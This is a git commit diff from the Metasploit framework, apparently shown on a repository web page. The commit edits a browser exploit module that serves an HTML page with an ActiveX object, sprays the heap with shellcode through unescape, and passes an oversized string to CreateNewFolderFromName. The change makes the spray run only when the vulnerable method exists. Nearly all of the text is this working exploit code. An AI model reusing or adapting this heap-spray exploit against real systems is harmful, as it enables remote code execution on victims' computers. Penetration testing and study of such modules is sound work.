play a little nicer with browser autopwn by not spraying the heap if creating the vulnerable object failed
git-svn-id: file:///home/svn/framework3/trunk@12667 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
3fedad5715
commit
36983436db
|
@ -92,11 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
boom = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
content = %Q|
|
||||
<html>
|
||||
<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
|
||||
<script language="JavaScript">
|
||||
function #{boom}() {
|
||||
var #{rand1} = unescape('#{shellcode}');
|
||||
var #{rand2} = unescape('#{ret}');
|
||||
var #{rand3} = 20;
|
||||
|
@ -110,6 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var #{rand8} = "A";
|
||||
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
|
||||
#{vname}.CreateNewFolderFromName(#{rand8});
|
||||
}
|
||||
if ((typeof #{vname}.CreateNewFolderFromName) != "undefined") {
|
||||
#{boom}();
|
||||
}
|
||||
</script>
|
||||
</html>
|
||||
|
|
||||
|
|
Loading…
Reference in New Issue